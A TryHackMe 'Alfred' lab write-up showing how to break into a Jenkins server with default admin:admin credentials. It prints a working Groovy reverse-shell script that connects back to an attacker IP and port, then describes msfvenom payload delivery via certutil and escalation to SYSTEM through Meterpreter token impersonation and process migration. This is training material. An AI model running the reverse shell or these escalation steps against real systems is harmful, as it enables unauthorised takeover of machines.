TryHackMe-Alfred
This room covers how to exploit a common misconfiguration on a widely used automation server(Jenkins) which is used to create continuous integration/continuous development pipelines that allow developers to automatically deploy their code once they made change to it). After which, we’ll use Privilege Escalate to get full system access.
We begin with an Nmap Scan
Head over to the webpage running at port 8080 and we find a login panel.The default username of Jenkins is “admin”.Looking at the username-password answer length, you can already guess it is admin:admin.
Next we could try looking for a Exploit of the version of Jenkins which is running but the room tells us about executing commands.So i tried to google “how to execute commands in jenkins and get a reverse shell” and this is one article i found, which you should read-https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6
I tried running the same command shown in the above blog but was unable to get a reverse shell on netcat.
If you read the article above, it seems to run “Groovy” script.Now visit PayloadAllTheThings and we find a reverse shell for Groovy-https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#powershell
If we just try to run the first script, we dont get a reverse connection on netcat.However if you look carefully, there is a more Stealthy option given below So lets use it.This is what my final command looks like(Make sure to put your local Ip and the netcat listening port):
Thread.start {
String host=”10.14.11.148";
int port=4444;
String cmd=”cmd.exe”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
}Lets Run It
And surely i got a shell on netcat !!!
Head over to the directory shown below and you can find the user flag
We have a shell but it will be much better if we had a Meterpreter shell which is more stable.
Now we will create a payload with msfvenom, Then transfer it to our windows machine and finally run the executable file, We will use a multi handler from metasploit to catch the connection.
First we will create the payload and name it as JENKINSPAYLOAD.exe and once its made, we start a SimpleHTTP Python server on port 777 (for hosting files so we can transfer it)
To transfer files to the target windows machine we can either use “Invoke-WebRequest” or Certutil which is a really useful tool and you will really find it useful in other CTFs as well.We type “Certutil” and sure enough it exists.Then we use the command shown below to transfer the JENKINSPAYLOAD.exe file to our target machine.
CERTUTIL USAGE(https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil)
Once we have transferred it, now lets start our multi handler in metasploit
Lets run our executble file using- .\JENLINSPAYLOAD.exe
And Surely You will get a connection on your metsaploit!!!
FROM HERE, IF YOU WANT TO BECOME ADMIN AND READ THE FLAG,INSTEAD OF FOLLOWING INSTRUCTIONS OF TRYHACKME, YOU CAN SIMPLY DO THIS
Run “ps” command and migrate over to “lsass.exe” process (Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process)
lsass.exe has the PID(process id) 676 where we want to migrate to as it runs with higher privileges.
To check if we are admin(NT AUTHORITY), run “getuid” command.The root flag can be found in the /config directory
NOW LETS FOLLOW THE INSTRUCTIONS GIVEN BY TRYHACKME AS PER TASK 3.Make sure you read the explanation as it is really valuable for understanding the concept.
whoami /privs doesn’t see to work.Instead we can run getprivs command
run the command “load incognito” and then “list_tokens -g” and follow along.
A bit about load incognito-(Incognito was originally a stand-alone application that allowed you to impersonate user tokens when successfully compromising a system. … They are a temporary key that allows you to access the system and network without having to provide credentials each time you access a file.)
To check which tokens are available, we entered “list_tokens -g”
We can see that the BUILTIN\Administrators token is available. Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token.
We are not done yet.In order to truely get admin privileges, we need to migrate to a privileged process.
(Explaination- Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions (above questions answer). The safest process to pick is the services.exe process. First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS)
We migrate to “services.exe” which has the PID 668
We Finally find the root flag in “C:\Windows\system32\config”
Thanks for checking out this writeup and i hope you learned something by solving this room.-ZEUS
